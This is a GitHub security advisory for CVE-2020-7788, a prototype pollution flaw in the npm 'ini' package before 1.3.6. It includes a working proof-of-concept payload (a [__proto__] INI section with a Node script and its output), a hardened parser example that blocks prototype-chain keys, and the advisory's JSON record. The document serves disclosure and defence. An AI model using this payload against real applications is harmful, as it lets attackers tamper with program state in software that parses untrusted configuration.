ghsa-qqgx-2p2h-9c37
Vulnerability from github
Published: 2020-12-10 16:53
Modified: 2022-12-03 03:55
Summary
ini before 1.3.6 vulnerable to Prototype Pollution via ini.parse
Details
Overview
The `ini` npm package before version 1.3.6 has a Prototype Pollution vulnerability.
If an attacker submits a malicious INI file to an application that parses it with `ini.parse`, they will pollute the prototype on the application. This can be exploited further depending on the context.
Patches
This has been patched in 1.3.6.
Steps to reproduce
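payload.ini
```
[__proto__]
polluted = "polluted"
```
poc.js:
```
var fs = require('fs')
var ini = require('ini')

var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8'))
console.log(parsed)
// parsed.__proto__ is Object.prototype, which now carries the injected key
console.log(parsed.__proto__)
// the bare identifier resolves through the global object's prototype chain
console.log(polluted)
```
```
> node poc.js
{}
{ polluted: 'polluted' }
{ polluted: 'polluted' }
polluted
```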
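For contrast with the behaviour reproduced above, here is a minimal INI reader that keeps every section in a null-prototype object and rejects section or key names that address the prototype chain. It is an added example, not the `ini` package's code or its 1.3.6 patch; `safeParseIni`, `BLOCKED`, `unquote` and the sample input are hypothetical names and data constructed for illustration.

```javascript
// Added example: a minimal hardened INI reader (not the ini package's code).
const BLOCKED = new Set(['__proto__', 'constructor', 'prototype']);

function unquote(s) {
  s = s.trim();
  const quoted = s.length >= 2 && s[0] === '"' && s[s.length - 1] === '"';
  return quoted ? s.slice(1, -1) : s;
}

function safeParseIni(text) {
  const out = Object.create(null); // null prototype: nothing inherited to pollute
  const rejected = [];
  let target = out;
  text.split(/\r?\n/).forEach((raw, i) => {
    const line = raw.trim();
    if (!line || line[0] === ';' || line[0] === '#') return;
    const sec = line.match(/^\[([^\]]*)\]$/);
    if (sec) {
      // Assumption: dotted section names are nested paths, e.g. [a.b].
      const parts = sec[1].split('.').map((p) => p.trim());
      if (parts.some((p) => BLOCKED.has(p))) {
        rejected.push({ line: i + 1, text: line });
        target = null; // ignore keys until the next acceptable section
        return;
      }
      target = out;
      for (const p of parts) {
        if (typeof target[p] !== 'object' || target[p] === null) {
          target[p] = Object.create(null);
        }
        target = target[p];
      }
      return;
    }
    if (target === null) return;
    const eq = line.indexOf('=');
    const key = unquote(eq === -1 ? line : line.slice(0, eq));
    if (BLOCKED.has(key)) {
      rejected.push({ line: i + 1, text: line });
      return;
    }
    target[key] = eq === -1 ? true : unquote(line.slice(eq + 1));
  });
  return { data: out, rejected };
}

// Constructed sample: the advisory's payload followed by a benign section.
const SAMPLE = '[__proto__]\npolluted = "polluted"\n[db]\nhost = "localhost"\n';
console.log(safeParseIni(SAMPLE));
```

The `rejected` list gives a caller something to log or alert on when untrusted configuration contains these names.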
```
{
  "affected": [
    {
      "package": { "ecosystem": "npm", "name": "ini" },
      "ranges": [
        {
          "events": [ { "introduced": "0" }, { "fixed": "1.3.6" } ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [ "CVE-2020-7788" ],
  "database_specific": {
    "cwe_ids": [ "CWE-1321" ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-12-10T16:51:39Z",
    "nvd_published_at": "2020-12-11T11:15:00Z",
    "severity": "HIGH"
  },
  "details": "### Overview\nThe `ini` npm package before version 1.3.6 has a Prototype Pollution vulnerability.\n\nIf an attacker submits a malicious INI file to an application that parses it with `ini.parse`, they will pollute the prototype on the application. This can be exploited further depending on the context.\n\n### Patches\n\nThis has been patched in 1.3.6.\n\n### Steps to reproduce\n\npayload.ini\n```\n[__proto__]\npolluted = \"polluted\"\n```\n\npoc.js:\n```\nvar fs = require(\u0027fs\u0027)\nvar ini = require(\u0027ini\u0027)\n\nvar parsed = ini.parse(fs.readFileSync(\u0027./payload.ini\u0027, \u0027utf-8\u0027))\nconsole.log(parsed)\nconsole.log(parsed.__proto__)\nconsole.log(polluted)\n```\n\n```\n\u003e node poc.js\n{}\n{ polluted: \u0027polluted\u0027 }\n{ polluted: \u0027polluted\u0027 }\npolluted\n```",
  "id": "GHSA-qqgx-2p2h-9c37",
  "modified": "2022-12-03T03:55:11Z",
  "published": "2020-12-10T16:53:45Z",
  "references": [
    { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7788" },
    { "type": "WEB", "url": "https://github.com/npm/ini/commit/56d2805e07ccd94e2ba0984ac9240ff02d44b6f1" },
    { "type": "PACKAGE", "url": "https://github.com/npm/ini" },
    { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/12/msg00032.html" },
    { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-INI-1048974" },
    { "type": "WEB", "url": "https://www.npmjs.com/advisories/1589" }
  ],
  "schema_version": "1.4.0",
  "severity": [
    { "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "type": "CVSS_V3" }
  ],
  "summary": "ini before 1.3.6 vulnerable to Prototype Pollution via ini.parse"
}
```